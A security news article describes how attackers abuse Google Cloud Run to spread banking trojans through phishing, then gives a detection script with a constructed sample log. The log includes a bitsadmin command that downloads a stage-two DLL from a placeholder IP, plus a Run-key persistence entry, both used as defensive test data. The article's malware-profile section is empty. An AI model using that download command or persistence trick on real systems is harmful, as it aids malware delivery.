
Google Cloud Run Exploited in Major Banking Trojan Offensive

Anas Hasan

Google Cloud Run, a service designed to streamline the deployment of both frontend and backend applications, is being abused by attackers to distribute banking trojans such as Astaroth, Mekotio, and Ousaban, according to security researchers.

Cisco Talos has reported a large surge in the abuse of Google Cloud Run for malware distribution since September 2023. The service’s low cost, and the fact that its traffic tends to pass conventional security filters and blocklists, have made it an attractive delivery platform for attackers.

Volume of Google Cloud Run-related phishing emails (source: Cisco)

Anatomy of the Cyber Attacks

The attack begins with carefully crafted phishing emails that masquerade as legitimate communications, such as invoices or official notifications from financial or governmental institutions. The emails are predominantly written in Spanish and aimed at Latin American recipients, but Italian-language emails have also been observed, extending the campaign’s reach.

Sample of phishing email (source: Cisco)

Victims are lured into clicking links within these emails, redirecting them to malevolent web services hosted on Google Cloud Run. In several instances, these links further redirect victims to download malicious ZIP archives containing MSI installer files from Google Cloud Storage, serving as the primary vehicle for malware delivery.

Upon execution, these MSI files download and launch additional malicious components, abusing legitimate Windows tools such as BITSAdmin for stealthy payload delivery. To survive a reboot, the malware creates or modifies startup items so that it is relaunched every time the system starts, solidifying its foothold.
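The delivery chain above (phishing link to a Cloud Run service, redirect to a ZIP/MSI on Google Cloud Storage, MSI installer spawning BITSAdmin, and a startup entry for persistence) gives a defender four observable stages to correlate. The following script is an added example written for this article, not code from Cisco Talos or PureVPN. It runs a small set of detection rules over constructed log lines in an invented `timestamp event_type key=value ...` format; the only real identifiers it relies on are the public `*.run.app` hostname suffix used by Cloud Run services, the `storage.googleapis.com` download host, `bitsadmin.exe`, and the Windows `...\CurrentVersion\Run` registry key. The hostnames, usernames, IP address and file paths in the sample log are made up.

```python
"""Detection rules for the Cloud Run banking-trojan delivery chain.

Constructed example: the log format and every sample line below are
invented for illustration. The rules look for the four stages described in
the article and correlate the first two per user.
"""
import re
from urllib.parse import urlparse

# Constructed sample log: "<timestamp> <event_type> <key=value ...>".
# Hostnames, users, IP (RFC 5737 documentation range) and paths are made up.
SAMPLE_LOG = """\
2024-02-20T09:01:12Z url user=alice src=email href=https://invoice-portal-abc123-uc.a.run.app/factura
2024-02-20T09:01:15Z url user=alice src=proxy href=https://storage.googleapis.com/bucket-x/factura_2024.zip
2024-02-20T09:02:40Z process user=alice parent=msiexec.exe image=bitsadmin.exe cmdline="bitsadmin /transfer job /download http://203.0.113.10/stage2.dll"
2024-02-20T09:02:55Z registry user=alice key=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run value=Updater data=C:\\Users\\alice\\AppData\\Roaming\\upd.exe
2024-02-20T09:10:00Z url user=bob src=proxy href=https://docs.example.com/report.pdf
2024-02-20T09:11:00Z process user=bob parent=explorer.exe image=notepad.exe cmdline="notepad.exe"
"""

CLOUD_RUN_SUFFIX = ".run.app"        # public hostname suffix of Cloud Run services
GCS_HOST = "storage.googleapis.com"  # Google Cloud Storage download host
ARCHIVE_EXT = (".zip", ".msi")       # delivery formats named in the article
# Per-user and machine-wide startup keys (Run / RunOnce) used for persistence
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.I)

# key=value pairs; a value is either a double-quoted string or a run of non-space chars
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line):
    """Parse one constructed log line into a dict; None if malformed."""
    parts = line.split(" ", 2)
    if len(parts) < 3:
        return None
    ts, kind, rest = parts
    fields = {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
              for m in KV_RE.finditer(rest)}
    return {"ts": ts, "kind": kind, **fields}


def detect(lines):
    """Return (timestamp, user, rule, detail) tuples for matching events."""
    alerts = []
    cloud_run_clicks = set()  # users who followed a Cloud Run link (for correlation)
    for raw in lines:
        ev = parse_line(raw.strip()) if raw.strip() else None
        if ev is None:
            continue
        user = ev.get("user", "?")
        if ev["kind"] == "url":
            parsed = urlparse(ev.get("href", ""))
            host = (parsed.hostname or "").lower()
            if host.endswith(CLOUD_RUN_SUFFIX):
                cloud_run_clicks.add(user)
                # Cloud Run has plenty of legitimate use; alert only on mail-borne links
                if ev.get("src") == "email":
                    alerts.append((ev["ts"], user, "cloud_run_link", host))
            elif host == GCS_HOST and parsed.path.lower().endswith(ARCHIVE_EXT):
                # A ZIP/MSI from Cloud Storage right after a Cloud Run click is the
                # article's delivery pattern; on its own it is too noisy to alert on
                if user in cloud_run_clicks:
                    alerts.append((ev["ts"], user, "gcs_archive_after_cloud_run_link", ev["href"]))
        elif ev["kind"] == "process":
            if (ev.get("parent", "").lower() == "msiexec.exe"
                    and ev.get("image", "").lower() == "bitsadmin.exe"):
                alerts.append((ev["ts"], user, "msi_spawns_bitsadmin", ev.get("cmdline", "")))
        elif ev["kind"] == "registry":
            if RUN_KEY_RE.search(ev.get("key", "")):
                alerts.append((ev["ts"], user, "run_key_persistence", ev.get("data", "")))
    return alerts


if __name__ == "__main__":
    for ts, user, rule, detail in detect(SAMPLE_LOG.splitlines()):
        print(f"{ts} {user:<6} {rule:<34} {detail}")
```

Running the script prints four alerts for `alice` (one per stage) and none for `bob`, whose GCS-free PDF download and ordinary process launch fall outside every rule. In a real environment the same rules would sit on proxy, EDR process-creation and registry telemetry; the per-user correlation is what keeps the Cloud Storage rule from firing on every legitimate archive download.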

The Malicious Software in Focus

Here is a closer look at the trio of malware: 

Final Word

The exploitation of Google Cloud Run for the distribution of banking trojans represents a significant evolution in cybercriminal tactics, highlighting the need for continuous vigilance and advanced security measures to protect against these sophisticated threats. 
